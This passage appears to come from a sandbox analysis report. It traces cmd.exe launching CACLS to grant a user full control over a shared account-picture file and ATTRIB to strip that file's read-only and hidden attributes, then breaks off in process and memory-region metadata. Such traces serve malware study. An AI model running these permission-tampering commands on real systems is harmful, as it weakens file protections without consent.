_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0187.578] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0187.578] GetEnvironmentStringsW () returned 0x62458* [0187.579] FreeEnvironmentStringsW (penv=0x62458) returned 1 [0187.579] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.579] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.579] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0187.579] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0187.579] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0187.579] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0187.579] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0187.579] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0187.579] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0187.579] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0187.579] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f450 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.579] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f450, lpFilePart=0x28f44c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f44c*="Desktop") returned 0x18 [0187.579] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.579] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f1cc | out: lpFindFileData=0x28f1cc) returned 0x60ae8 [0187.579] FindClose (in: hFindFile=0x60ae8 | out: hFindFile=0x60ae8) returned 1 [0187.579] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f1cc | out: lpFindFileData=0x28f1cc) returned 0x60ae8 [0187.579] FindClose (in: 
hFindFile=0x60ae8 | out: hFindFile=0x60ae8) returned 1 [0187.579] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f1cc | out: lpFindFileData=0x28f1cc) returned 0x60ae8 [0187.579] FindClose (in: hFindFile=0x60ae8 | out: hFindFile=0x60ae8) returned 1 [0187.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.580] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0187.580] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0187.580] GetEnvironmentStringsW () returned 0x60308* [0187.580] FreeEnvironmentStringsW (penv=0x60308) returned 1 [0187.580] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.580] GetConsoleOutputCP () returned 0x1b5 [0187.580] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.580] GetUserDefaultLCID () returned 0x409 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f590, cchData=128 | out: lpLCData="0") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f590, cchData=128 | out: lpLCData="0") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f590, cchData=128 | out: lpLCData="1") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0187.581] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0187.582] GetConsoleTitleW (in: lpConsoleTitle=0x509b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.582] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.582] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0187.582] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0187.582] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0187.583] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0187.615] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0187.615] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0187.615] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0187.615] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0187.615] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0187.615] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0187.615] _wcsicmp (_String1="REM/?", 
_String2="CACLS") returned 15 [0187.618] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0187.618] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0187.618] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0187.618] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0187.618] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0187.618] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0187.618] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0187.620] GetConsoleTitleW (in: lpConsoleTitle=0x28f224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.620] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.621] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.621] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.621] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.621] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.621] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.621] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.621] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.621] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.621] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.621] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.621] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.621] _wcsicmp (_String1="CACLS", 
_String2="PATH") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.621] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.621] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.621] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.621] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.621] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.621] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.621] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.621] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.621] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.621] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.621] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.621] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.621] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.621] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.621] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.621] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.621] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.622] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.622] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.622] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.622] _wcsicmp 
(_String1="CACLS", _String2="CHDIR") returned -7 [0187.622] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.622] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.622] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.622] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.622] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.622] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.622] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.622] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.622] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.622] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.622] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.622] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.622] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.622] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.622] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.622] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.622] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.622] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.622] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.622] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.622] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.622] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.622] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.622] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.622] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.622] 
_wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.622] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.622] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.622] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.622] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.622] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0187.622] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0187.622] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0187.623] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0187.623] SetErrorMode (uMode=0x0) returned 0x0 [0187.623] SetErrorMode (uMode=0x1) returned 0x0 [0187.623] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x61e98, lpFilePart=0x28ed44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28ed44*="Desktop") returned 0x18 [0187.623] SetErrorMode (uMode=0x0) returned 0x1 [0187.623] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.623] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.628] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.629] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.629] GetLastError () returned 0x2 [0187.629] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x28eac0, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.629] GetLastError () returned 0x2 [0187.629] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0x62180 [0187.629] FindClose (in: hFindFile=0x62180 | out: hFindFile=0x62180) returned 1 [0187.630] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.630] GetLastError () returned 0x2 [0187.630] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0x62180 [0187.630] FindClose (in: hFindFile=0x62180 | out: hFindFile=0x62180) returned 1 [0187.630] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.630] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.630] GetConsoleTitleW (in: lpConsoleTitle=0x28efb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.630] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee40, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef08 | out: lpAttributeList=0x28ee40, lpSize=0x28ef08) returned 1 [0187.630] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee40, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef00, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee40, lpPreviousValue=0x0) returned 1 [0187.630] GetStartupInfoW (in: lpStartupInfo=0x28edfc | out: lpStartupInfo=0x28edfc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, 
dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.630] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.631] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ee9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28eee8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x28eee8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf00, dwThreadId=0x4f4)) returned 1 [0187.633] CloseHandle (hObject=0x4c) returned 1 [0187.633] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.634] GetEnvironmentStringsW () returned 0x60308* [0187.634] FreeEnvironmentStringsW (penv=0x60308) returned 1 [0187.634] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0187.839] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x28eddc | out: lpExitCode=0x28eddc*=0x0) returned 1 [0187.839] CloseHandle (hObject=0x50) returned 1 [0187.839] _vsnwprintf (in: _Buffer=0x28ef24, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ede8 | out: _Buffer="00000000") returned 8 [0187.839] SetEnvironmentVariableW (lpName="=ExitCode", 
lpValue="00000000") returned 1 [0187.839] GetEnvironmentStringsW () returned 0x62410* [0187.839] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.839] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.839] GetEnvironmentStringsW () returned 0x62410* [0187.840] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.840] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ee40 | out: lpAttributeList=0x28ee40) [0187.840] GetConsoleTitleW (in: lpConsoleTitle=0x28f224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.840] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.840] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.840] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.840] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.841] GetLastError () returned 0x2 [0187.841] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.841] GetLastError () returned 0x2 [0187.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0x5e4d8 [0187.841] FindClose (in: hFindFile=0x5e4d8 | out: hFindFile=0x5e4d8) returned 1 [0187.841] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.841] GetLastError () returned 0x2 [0187.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0x5e4d8 [0187.841] FindClose (in: hFindFile=0x5e4d8 | out: hFindFile=0x5e4d8) returned 1 [0187.841] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.841] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.842] GetConsoleTitleW (in: lpConsoleTitle=0x28efb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.842] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee40, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef08 | out: lpAttributeList=0x28ee40, lpSize=0x28ef08) returned 1 [0187.842] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee40, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef00, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee40, lpPreviousValue=0x0) returned 1 [0187.842] GetStartupInfoW (in: lpStartupInfo=0x28edfc | out: lpStartupInfo=0x28edfc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.842] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.842] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, 
bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ee9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28eee8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"", lpProcessInformation=0x28eee8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xf4c, dwThreadId=0x8b4)) returned 1 [0187.843] CloseHandle (hObject=0x50) returned 1 [0187.843] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.843] GetEnvironmentStringsW () returned 0x62410* [0187.843] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.843] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0187.884] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x28eddc | out: lpExitCode=0x28eddc*=0x0) returned 1 [0187.884] CloseHandle (hObject=0x4c) returned 1 [0187.884] _vsnwprintf (in: _Buffer=0x28ef24, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ede8 | out: _Buffer="00000000") returned 8 [0187.884] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.885] GetEnvironmentStringsW () returned 0x62410* [0187.885] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.885] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.885] GetEnvironmentStringsW () returned 0x62410* [0187.885] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.885] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ee40 | out: lpAttributeList=0x28ee40) [0187.885] _get_osfhandle (_FileHandle=1) returned 0x7 
[0187.885] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.885] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.885] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.885] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.885] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.885] SetConsoleInputExeNameW () returned 0x1 [0187.885] GetConsoleOutputCP () returned 0x1b5 [0187.885] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.885] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.886] exit (_Code=0) Process: id = "398" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ca0" os_pid = "0xf00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "397" os_parent_pid = "0x908" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27179 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27180 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27181 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 
